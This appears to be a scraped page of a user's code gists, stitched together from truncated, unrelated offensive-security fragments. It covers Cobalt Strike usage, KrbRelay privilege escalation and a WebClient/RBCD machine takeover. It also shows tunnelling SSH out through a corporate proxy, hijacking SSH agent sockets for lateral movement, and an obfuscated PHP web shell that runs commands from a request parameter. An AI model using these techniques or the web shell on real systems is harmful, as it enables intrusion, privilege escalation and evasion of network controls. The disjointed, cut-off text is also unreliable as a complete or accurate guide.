filipesam
| MANUAL COBALT STRIKE | |
| !------------------------------------------------- --Standard Commands---------------------------------------------- -----! | |
| Creating a load | |
| Attacks->Packages-> | |
| interact - choose an agent | |
| help -> will show a list of commands | |
| help [command] will show help for a specific command | |
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
| # Client (Cygwin) | |
| lynx -source rawgit.com/transcode-open/apt-cyg/master/apt-cyg > apt-cyg | |
| install apt-cyg /bin | |
| apt-cyg install httptunnel | |
| htc -P $CORP_HTTP_PROXY_HOST:$CORP_HTTP_PROXY_PORT -F 8888 $HTS_SERVER_HOST:80 | |
| ssh -p 8888 $USER@localhost |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <Windows.h> | |
| extern "C" __declspec(dllexport) LONG CplApplet() | |
| { | |
| MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0); | |
| return 1; | |
| } |
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
| title | author | date | source | notoc |
|---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |